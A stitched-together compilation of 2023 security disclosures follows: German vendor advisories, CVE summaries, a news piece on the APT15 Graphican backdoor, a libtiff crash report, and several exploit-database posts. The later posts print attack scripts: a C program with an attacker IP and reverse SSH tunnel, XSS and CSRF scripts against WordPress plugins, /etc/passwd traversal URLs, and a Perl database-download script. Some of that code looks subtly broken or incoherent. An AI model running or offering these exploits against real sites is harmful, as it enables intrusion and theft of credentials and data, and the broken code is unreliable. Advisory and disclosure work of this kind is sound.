A reflected cross-site scripting (XSS) vulnerability in DATEV eG Personal-Management System Comfort/Comfort Plus v15.1.0 to v16.1.1 P4 allows attackers to steal targeted users' login data by sending a crafted link.

**Sicherheitslücke im Bewerberportal "Datev Personal-Managementsystem comfort/comfort plus" der Firma DATEV eG**

Der Sicherheitsforscher Max Bäumler, von der TÜV Rheinland i-sec GmbH hat eine Sicherheitslücke im Bewerberportal "Datev Personal-Managementsystem comfort/comfort plus" der Firma DATEV eG entdeckt. Betroffen sind die Versionen 15.1.0 P6 (vermutlich ab 15.1.0) - 16.1.1 P1 (vermutlich bis 16.1.1 P3).

DATEV eG wurde am 25.04.2023 über die Schwachstelle informiert. Ein Sicherheitsupdate mit der Versionsnummer 16.1.1 P4 wurde am 28.04.2023 bereitgestellt, welches diese Schwachstelle behebt. Dieser Patch ist unter nachfolgender URL zum Download bereitgestellt: https://support.veda.net/datev.php Es wird empfohlen, dass Betroffene Nutzer diesen Patch sobald wie möglich einspielen.

Die Schwachstelle wurde mit der Kennung CVE-2023-33387 versehen und hat einen hohen CVSS-Schweregrad 7,1 von 10.

Einem potenziellen Angreifer ist es möglich, sofern ein Nutzer einen vom Angreifer manipulierten Link anklickt, die Zugangsdaten des Nutzers abzugreifen wenn dieser sich einloggt. Dadurch kann er Zugriff auf die persönlichen Daten des Nutzers wie z. B. Bewerbungsunterlagen erhalten.

Die Forscher der TÜV Rheinland i-sec GmbH bedanken sich bei DATEV eG für die professionelle Zusammenarbeit sowie die ihr Engagement um eine zeitnahe Bereitstellung des Sicherheitsupdates.

**ENOVIA V6 - Mehrere Sicherheitslücken ermöglichen Remote-Code-Ausführung**

Sicherheitsforscher Shadi Habbal, von der TÜV Rheinland i-sec GmbH, hat zwei Sicherheitslücken in "ENOVIA V6", einem Produkt von Dassault Systèmes, entdeckt. Bei den entdeckten Schwachstellen handelt es sich um XSLT- und XXE-Injektionen, die verkettet werden können, um Remotecodeausführung auf den betroffenen Systemen zu erreichen. Die Schwachstellen wurden während einer Red-Team-Kampagne entdeckt.

Die betroffene Version von ENOVIA ist „V6R2013xE“.

Dassault Systèmes wurde am 10. August 2022 über diese Sicherheitslücke informiert, und am 28. November 2022 wurde ein Fix veröffentlicht. Der Patch behebt die Sicherheitslücken in der unterstützten Version. Es ist wichtig, dass Benutzer der betroffenen Versionen von ENOVIA den Patch so bald wie möglich installieren.

Den Schwachstellen wurden die Kennungen CVE-2023-1288 und CVE-2023-1287 zugewiesen und haben einen hohen Schweregrad.

TÜV Rheinland i-sec GmbH bedankt sich bei Dassault Systèmes für Ihr Engagement, die Schwachstellen zu beheben.

**baramundi Management Agent - Von Buffer-Overflow zu Remote-Code-Execution**

Der Sicherheitsforscher Shadi Habbal von TÜV Rheinland i-sec GmbH hat eine Buffer Overflow-Schwachstelle in dem „baramundi Management Agent“ (bMA), einem Modul der „baramundi Management Suite“ (bMS), entdeckt. Ein Angreifer könnte möglicherweise diese Schwachstelle ausnutzen, um das betroffene Modul abstürzen zu lassen oder bei Erfüllung bestimmter Bedingung, z. B. CVE-2022-44654, Remote-Code-Execution zu erreichen. In beiden Szenarien müssen Angreifende in der Lage sein, den oder die Benutzer\*in dazu zu bringen, eine vorbereitete bzw. manipulierte Webseite zu besuchen, die im Internet/Intranet gehostet wird.

Betroffene Produkte sind alle Versionen von baramundi, einschließlich bMS 2022 R1, bMS 2021 R2, bMS 2021 R1 und früher.

baramundi AG wurde am 04.08.2022 über diese Schwachstelle informiert und das Sicherheitsupdate "S-2022-01" wurde am 27.09.2022 veröffentlicht. Das Sicherheitsupdate behebt die Schwachstelle in allen unterstützten Versionen. Es ist wichtig, dass Benutzer von betroffenen Versionen von baramundi den Patch so schnell wie möglich installieren.

Die Schwachstelle wurde mit der Kennung CVE-2022-43747 zugewiesen und hat einen hohen Schweregrad.

Der Forscher und die TÜV Rheinland i-sec GmbH möchten dem Product-Security-Incident-Response-Team von baramundi für die professionelle Kommunikation und baramundis Engagement bei der Beseitigung dieser Schwachstelle danken.

**Trend Micro Apex One - Schwachstelle in UMH-Monitoring-Engine-Module**

Sicherheitsforscher Shadi Habbal von der TÜV Rheinland i-sec GmbH hat eine Schwachstelle im User-Mode-Hooking (UMH) Monitoring-Engine-Modul von Trend Micro Apex One und Apex One as a Service entdeckt. Diesem Modul fehlt eine wichtige Sicherheitsfeature namens "SafeSEH". Das Modul hilft bei der Überwachung auf bösartige Nutzdaten unter Windows, indem es sich selbst in jeden Prozess im Benutzermodus injiziert und in bestimmte Windows-APIs einhakt.

Das Fehlen des "SafeSEH"-Schutzes macht das Modul angreifbar. Ein Angreifer könnte eine SEH-basierte Pufferüberlauf-Schwachstelle so ausnutzen, dass mithilfe dieser Schwachstelle eine wichtige Voraussetzung erfüllt wird, um Sicherheitsmaßnahmen zu umgehen und der betroffenen Software oder dem Gerät, auf dem sie läuft, Schaden zuzufügen. Diese Schwachstelle betrifft Apex One 2019 (On-Premises) und Apex One as a Service.

Trend Micro wurde am 8.08.2022 über diese Schwachstelle informiert und ein Fix wurde am 25.10.2022 veröffentlicht. Es wird empfohlen, dass Benutzer der betroffenen Versionen von Apex One diesen Patch oder den letzten verfügbaren kumulativen Patch so schnell wie möglich installieren. Die Schwachstelle wurde mit der Kennung CVE-2022-44654 versehen und hat einen CVSS-Schweregrad 7,5 von 10.

Die TÜV Rheinland i-sec GmbH dankt dem Product-Security-Incident-Response-Team von Trend Micro für die professionelle Kommunikation und für das Engagement von Trend Micro bei der Behebung dieser Schwachstelle.

**Lokale Rechteausweitung-Schwachstelle in otris “Update Manager”**

"Update Manager" in der Version 1.2.1.0 (und möglicherweise früher), eine Softwarekomponente der otris software AG, die von mehreren otris-Anwendungen, z.B. otris Privacy, verwendet wird, um die Aktualisierung von otris-Produkten zu erleichtern; ermöglicht Angreifern, ihre Rechte auf Windows-Systemen auf SYSTEM (höchste Berechtigung unter Windows) zu erweitern, indem sie eine Schwachstelle in der oben genannten Software ausnutzen.

Bekannte betroffene otris-Produkte sind otris Privacy < v7.0.7. Andere otris-Produkte, die die betroffene Software verwenden, könnten ebenfalls betroffen sein.

Unternehmen wird empfohlen zu prüfen, ob die oben genannte Software auf ihren Systemen im Einsatz ist und sich bei der otris software AG nach aktuellen Versionen zu erkundigen.

Sicherheitsforscher Shadi Habbal von der TÜV Rheinland i-sec GmbH entdeckte die Schwachstelle während eines aktiven Penetrationstests und nutzte die Schwachstelle erfolgreich als Proof-of-Concept aus.

Die Schwachstelle wurde am 01.09.2021 an die otris software AG gemeldet. Der otris software AG wurde eine Frist von 90 Tagen eingeräumt, um einen Fix zu veröffentlichen. Weitere 60 Tage wurden gewährt, um Unternehmen bei der Aktualisierung ihrer Systeme zu unterstützen.

Die Schwachstelle wurde nach Aussage von otris behoben und das Produkt im Anschluss einem Penetrationstest unterzogen.

Die Schwachstelle wurde CVE-2021-40376 zugeordnet. Weitere technische Einzelheiten finden Sie in dem beigefügten PDF-Dokument.

CVE-2023-33387: TÜV Rheinland – Aufgedeckte Schwachstellen

IBM SPSS Modeler on Windows 17.0, 18.0, 18.2.2, 18.3, 18.4, and 18.5 requires the end user to have access to the server SSL key which could allow a local user to decrypt and obtain sensitive information.  IBM X-Force ID:  256117.

CVE-2023-33842: IBM SPSS Modeler information disclosure CVE-2023-33842 Vulnerability Report

On Windows, it is possible to open a `livebook://` link from a browser which opens Livebook Desktop and triggers arbitrary code execution on victim's machine.

Any user using Livebook Desktop on Windows is potentially vulnerable to arbitrary code execution when they expect Livebook to be opened from browser.



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-35174

**Livebook Desktop's protocol handler can be exploited to execute arbitrary command on Windows**

**Package**

**Affected versions**

\>= 0.8.0, < 0.8.2

\>= 0.9.0, < 0.9.3

**Patched versions**

0.8.2

0.9.3

**Description**

Published to the GitHub Advisory Database

Jun 21, 2023

**Weaknesses**

**GHSA ID**

GHSA-564w-97r7-c6p9

**Source code**

GHSA-564w-97r7-c6p9: Livebook Desktop's protocol handler can be exploited to execute arbitrary command on Windows

The notorious APT15 used common malware tools and a third-generation custom "Graphican" backdoor to continue its information gathering exploits, this time against foreign ministries.

From late 2022 to early 2023, a Chinese state-level threat actor used a novel malware to conduct espionage against foreign ministries in North and South America.

The group in question, APT15 (aka Flea, Nickel, Vixen Panda, KE3CHANG, Royal APT, and Playful Dragon) already "has a track record of honing in on government targets, diplomatic missions, and embassies, likely for intelligence-gathering purposes," Symantec researchers explained in a June 21 blog post. In recent years it has targeted diplomatic organizations, government organizations, and NGOs.

This latest campaign primarily focused on ministries of foreign affairs, but also included a government finance department and a corporation. All the targets were based in the Americas, a region which "does appear to have become more of a focus for the group in recent times," the researchers wrote.

To carry out their espionage, APT15 employed well over a dozen tools, malicious and otherwise. Among its arsenal: Mimikatz and two of its variants, four Web shells including AntSword and China Chopper, and CVE-2020-1472, a three-year-old but CVSS 10.0 "Critical" privilege escalation vulnerability in the Windows server process Netlogon.

The attackers' only unique tool was Graphican, a new variant of its old Trojan backdoor used to run commands and download files from victim machines. "This backdoor has evolved some of its anti-detection mechanisms," acknowledges Avishai Avivi, CISO at SafeBreach. "That said, the fact that threat actors often use the same techniques allows companies to test their defenses proactively."

**What Is Graphican?**

Graphican is an iteration on APT15's other Trojan backdoor, Ketrican, itself an evolution of their earlier model, BS2005.

Graphican mostly distinguishes itself by foregoing a typical, hardcoded command-and-control (C2) server. Instead, it uses Microsoft Graph — an API for Microsoft 365 services — to retrieve an encrypted server address from a OneDrive folder.

Once the connection is made and the machine compromised, however, Graphican possesses the same basic functionalities as its predecessor — creating an attacker-controlled command line on the victim machine, creating new processes and files, and downloading files. "The similarities in functionality between Graphican and the known Ketrican backdoor may indicate that the group is not very concerned about having activity attributed to it," the researchers speculate.

Avivi sees it differently. "The reality is that APT groups are really looking for efficiency," he says. "Suppose a tool is proven effective for launching attacks or opening backdoors. In that case, they'll keep using it until it loses its efficacy or is stopped. R&D costs time and money for adversaries just like it does for companies."

**Who Is APT15?**

According to Symantec, APT15 has been around for nearly two decades. The group has made its biggest waves in recent years, however, so much so that in 2021 Microsoft's Digital Crimes Unit performed a coordinated seizure of its known infrastructure. Even that coordinated action from Microsoft wasn't enough to stop APT15, which returned a year later with a spyware campaign targeting Uyghur populations en masse.

Organizations interested in hardening against APT15 may not want to start with infection vectors. The group has been known to use phishing emails, "but there have also been reports of it exploiting public-facing applications, as well as using VPNs, to gain initial access to victim networks," Symantec explained.

On the other hand, the relative consistency in APT15's malware can be of benefit to defenders.

"Adversaries will use proven techniques to accomplish their goals," Avivi says, pointing to APT15's rehashing of largely similar malicious backdoors. "That is one, among many reasons, why validating security controls against known patterns and cycles can help companies better defend against these threat actors."

20-Year-Old Chinese APT15 Finds New Life in Foreign Ministry Attacks

libtiff 4.5.0 is vulnerable to Buffer Overflow via extractContigSamplesShifted8bits() at /libtiff/tools/tiffcrop.c:3753.

Skip to content

Open Issue created Jan 27, 2023 by **Tseng Szu Wei@13579and24680**

**heap-buffer-overflow in extractContigSamplesShifted8bits() at /libtiff/tools/tiffcrop.c:3753 (SIGSEGV)**

**Summary**

An SIGSEGV caused when using tiffcrop.

AddressSanitizer reports it as heap-buffer-overflow.

**Version**

    $ ./tools/tiffcrop  -v
    Library Release: LIBTIFF, Version 4.5.0
    Copyright (c) 1988-1996 Sam Leffler
    Copyright (c) 1991-1996 Silicon Graphics, Inc.
    Tiffcp code: Copyright (c) 1988-1997 Sam Leffler
               : Copyright (c) 1991-1997 Silicon Graphics, Inc
    Tiffcrop additions: Copyright (c) 2007-2010 Richard Nolde
    
    $ git log --oneline -1
    a63e18ca (HEAD -> master, origin/master, origin/HEAD) Merge branch 'add_windows_DLL_versioninfo' into 'master'

**Steps to reproduce****make**

    git clone https://gitlab.com/libtiff/libtiff.git
    cd libtiff
    ./autogen.sh
    ./configure
    make

**run**

    ./tools/tiffcrop -E l -Z 12:50,12:99 -e divided  -R 270  poc  /dev/null
    TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order.
    TIFFReadDirectory: Warning, Unknown field with tag 292 (0x124) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 309 (0x135) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 16658 (0x4112) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 512 (0x200) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 32256 (0x7e00) encountered.
    poc: Warning, Nonstandard tile width 1, convert file.
    TIFFFetchNormalTag: Warning, Incorrect count for "FillOrder"; tag ignored.
    TIFFReadDirectory: Warning, Invalid data type for tag StripOffsets.
    TIFFFetchNormalTag: Warning, IO error during reading of "Tag 16658"; tag ignored.
    _TIFFVSetField: poc: Null count for "Tag 32256" (type 1, writecount -3, passcount 1).
    TIFFReadDirectory: Warning, Invalid data type for tag StripByteCounts.
    TIFFAdvanceDirectory: Error fetching directory count.
    Fax4Decode: Bad code word at line 1 of tile 0 (x 0).
    Fax4Decode: Warning, Premature EOL at line 1 of tile 0 (got 0, expected 1).
    Fax4Decode: Bad code word at line 1 of tile 1 (x 0).
    Fax4Decode: Warning, Premature EOL at line 1 of tile 1 (got 0, expected 1).
    Fax4Decode: Warning, Premature EOL at line 2 of tile 1 (got 0, expected 1).
    Fax4Decode: Uncompressed data (not supported) at line 0 of tile 2 (x 0).
    Fax4Decode: Warning, Premature EOL at line 0 of tile 2 (got 0, expected 1).
    Fax4Decode: Uncompressed data (not supported) at line 2 of tile 2 (x 0).
    Fax4Decode: Warning, Premature EOL at line 2 of tile 2 (got 0, expected 1).
    Fax4Decode: Warning, Premature EOL at line 3 of tile 2 (got 0, expected 1).
    Fax4Decode: Bad code word at line 1 of tile 3 (x 0).
    Fax4Decode: Warning, Premature EOL at line 1 of tile 3 (got 0, expected 1).
    Fax4Decode: Warning, Line length mismatch at line 0 of tile 4 (got 2, expected 1).
    Fax4Decode: Warning, Premature EOF at line 14 of tile 4 (x 0).
    Fax4Decode: Warning, Premature EOL at line 14 of tile 4 (got 0, expected 1).
    Fax4Decode: Uncompressed data (not supported) at line 0 of tile 5 (x 0).
    Fax4Decode: Warning, Premature EOL at line 0 of tile 5 (got 0, expected 1).
    Fax4Decode: Uncompressed data (not supported) at line 2 of tile 5 (x 0).
    Fax4Decode: Warning, Premature EOL at line 2 of tile 5 (got 0, expected 1).
    Fax4Decode: Uncompressed data (not supported) at line 4 of tile 5 (x 0).
    Fax4Decode: Warning, Premature EOL at line 4 of tile 5 (got 0, expected 1).
    Fax4Decode: Warning, Premature EOF at line 6 of tile 5 (x 0).
    (... too long ignore)
    
    fish: Job 1, './tools/tiffcrop -E l -Z 12:50,…' terminated by signal SIGSEGV (Address boundary error)

**Platform**

    $ uname -a
    Linux 13579 5.15.0-56-generic #62~20.04.1-Ubuntu SMP Tue Nov 22 21:24:20 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
    
    $ gcc --version
    gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
    Copyright (C) 2019 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

**ASAN report**

    =================================================================
    ==1821995==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6330000188ec at pc 0x56501555da96 bp 0x7ffc6a94efd0 sp 0x7ffc6a94efc0
    READ of size 1 at 0x6330000188ec thread T0
        #0 0x56501555da95 in extractContigSamplesShifted8bits /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:3753
        #1 0x565015573ffe in extractSeparateRegion /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:7605
        #2 0x565015577fd0 in processCropSelections /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:8621
        #3 0x56501555a0e9 in main /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:2807
        #4 0x7f9dc504e082 in __libc_start_main ../csu/libc-start.c:308
        #5 0x565015550b6d in _start (/home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/.libs/tiffcrop+0x9b6d)
    
    0x6330000188ec is located 233 bytes to the right of 98307-byte region [0x633000000800,0x633000018803)
    allocated by thread T0 here:
        #0 0x7f9dc5703808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
        #1 0x7f9dc558af03 in _TIFFmalloc /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/libtiff/tif_unix.c:326
        #2 0x565015550d00 in limitMalloc /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:710
        #3 0x565015571998 in loadImage /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:7087
        #4 0x565015559f86 in main /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:2783
        #5 0x7f9dc504e082 in __libc_start_main ../csu/libc-start.c:308
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:3753 in extractContigSamplesShifted8bits
    Shadow bytes around the buggy address:
      0x0c667fffb0c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c667fffb0d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c667fffb0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c667fffb0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c667fffb100: 03 fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c667fffb110: fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa
      0x0c667fffb120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c667fffb130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c667fffb140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c667fffb150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c667fffb160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1821995==ABORTING

**poc**

poc

CVE-2023-25435: heap-buffer-overflow in extractContigSamplesShifted8bits()  at /libtiff/tools/tiffcrop.c:3753 (SIGSEGV) (#518) · Issues · libtiff / libtiff · GitLab

Nokia ASIKA version 7.13.52 suffers from a hard-coded private key disclosure vulnerability.

    // Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure// Date: 2023-06-20// Exploit Author: Amirhossein Bahramizadeh// Category : Hardware// Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/// Version: 7.13.52 (REQUIRED)// Tested on: Windows/Linux// CVE : CVE-2023-25187#include <stdio.h>#include <stdlib.h>#include <string.h>#include <errno.h>#include <unistd.h>#include <netinet/in.h>#include <arpa/inet.h>#include <sys/socket.h>#include <sys/types.h>#include <sys/wait.h>#include <signal.h>// The IP address of the vulnerable devicechar *host = "192.168.1.1";// The default SSH port numberint port = 22;// The username and password for the BTS service user accountchar *username = "service_user";char *password = "password123";// The IP address of the attacker's machinechar *attacker_ip = "10.0.0.1";// The port number to use for the MITM attackint attacker_port = 2222;// The maximum length of a message#define MAX_LEN 1024// Forward data between two socketsvoid forward_data(int sock1, int sock2){    char buffer[MAX_LEN];    ssize_t bytes_read;    while ((bytes_read = read(sock1, buffer, MAX_LEN)) > 0)    {        write(sock2, buffer, bytes_read);    }}int main(){    int sock, pid1, pid2;    struct sockaddr_in addr;    char *argv[] = {"/usr/bin/ssh", "-l", username, "-p", "2222", "-o", "StrictHostKeyChecking=no", "-o", "UserKnownHostsFile=/dev/null", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-i", "/path/to/private/key", "-N", "-R", "2222:localhost:22", host, NULL};    // Create a new socket    sock = socket(AF_INET, SOCK_STREAM, 0);    // Set the address to connect to    memset(&addr, 0, sizeof(addr));    addr.sin_family = AF_INET;    addr.sin_port = htons(port);    inet_pton(AF_INET, host, &addr.sin_addr);    // Connect to the vulnerable device    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)    {        fprintf(stderr, "Error connecting to %s:%d: %s\n", host, port, strerror(errno));        exit(1);    }    // Send the SSH handshake    write(sock, "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10\r\n", 42);    read(sock, NULL, 0);    // Send the username    write(sock, username, strlen(username));    write(sock, "\r\n", 2);    read(sock, NULL, 0);    // Send the password    write(sock, password, strlen(password));    write(sock, "\r\n", 2);    // Wait for the authentication to complete    sleep(1);    // Start an SSH client on the attacker's machine    pid1 = fork();    if (pid1 == 0)    {        execv("/usr/bin/ssh", argv);        exit(0);    }    // Start an SSH server on the attacker's machine    pid2 = fork();    if (pid2 == 0)    {        execl("/usr/sbin/sshd", "/usr/sbin/sshd", "-p", "2222", "-o", "StrictModes=no", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-o", "AuthorizedKeysFile=/dev/null", "-o", "HostKey=/path/to/private/key", NULL);        exit(0);    }    // Wait for the SSH server to start    sleep(1);    // Forward data between the client and the server    pid1 = fork();    if (pid1 == 0)    {        forward_data(sock, STDIN_FILENO);        exit(0);    }    pid2 = fork();    if (pid2 == 0)    {        forward_data(STDOUT_FILENO, sock);        exit(0);    }    // Wait for the child processes to finish    waitpid(pid1, NULL, 0);    waitpid(pid2, NULL, 0);    // Close the socket    close(sock);    return 0;}

Nokia ASIKA 7.13.52 Private Key Disclosure

WordPress Super Socializer plugin version 7.13.52 suffers from a cross site scripting vulnerability.

    # Exploit Title: Super Socializer 7.13.52 - Reflected XSS# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com# Date: 2023-06-20# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/super-socializer# Version: 7.13.52 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-2779import requests# The URL of the vulnerable AJAX endpointurl = "https://example.com/wp-admin/admin-ajax.php"# The vulnerable parameter that is not properly sanitized and escapedvulnerable_param = "<img src=x onerror=alert(document.domain)>"# The payload that exploits the vulnerabilitypayload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}# Send a POST request to the vulnerable endpoint with the payloadresponse = requests.post(url, data=payload)# Check if the payload was executed by searching for the injected script tagif "<img src=x onerror=alert(document.domain)>" in response.text:    print("Vulnerability successfully exploited")else:    print("Vulnerability not exploitable")

WordPress Super Socializer 7.13.52 Cross Site Scripting

Accent Microcomputers CMS version 2.4 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Accent Microcomputers CMS v 2.4 Directory Traversal Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Telegram  : @indoushka                                                                                                         || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://www.accent.com.pl                                                                                           |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : ../../../../../../../../../etc/passwdhttp://127.0.0.1/www/mmrtradingpl/index.php?id=50&file=../../../../../../../../../etc/passwdhttp://127.0.0.1/www/transcomfortpl/index.php?id=50&file=../../../../../../../../../etc/passwd=====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh        |============================================================================================================================================

Accent Microcomputers CMS 2.4 Directory Traversal

WordPress WP Sticky Social plugin version 1.0.1 suffers from cross site request forgery and cross site scripting vulnerabilities.

    # Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)#  Dork: inurl:~/admin/views/admin.php# Date: 2023-06-20# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social# Version: 1.0.1 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-3320import requestsimport hashlibimport time# Set the target URLurl = "http://example.com/wp-admin/admin.php?page=wpss_settings"# Set the user agent stringuser_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"# Generate the nonce valuenonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()# Set the data payloadpayload = {    "wpss_nonce": nonce,    "wpss_setting_1": "value_1",    "wpss_setting_2": "value_2",    # Add additional settings as needed}# Set the request headersheaders = {    "User-Agent": user_agent,    "Referer": url,    "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",    # Add additional headers as needed}# Send the POST requestresponse = requests.post(url, data=payload, headers=headers)# Check the response status codeif response.status_code == 200:    print("Request successful")else:    print("Request failed")

WordPress WP Sticky Social 1.0.1 CSRF / Cross Site Scripting

A Cart version 2.0 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : A cart 2.0 Database Disclosure Exploit                                                                             |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://ToastForums.com                                                                                             |    
| # Dork      :                                                                                                                    |  
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (acart.mdb ) file  
    The (acart.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# A_cart 2.0 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
system('A_cart 2.0 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="acart2_0.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/acart2_0.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/acart2_0.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :==============================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |   
============================================================================================

Tag

#windows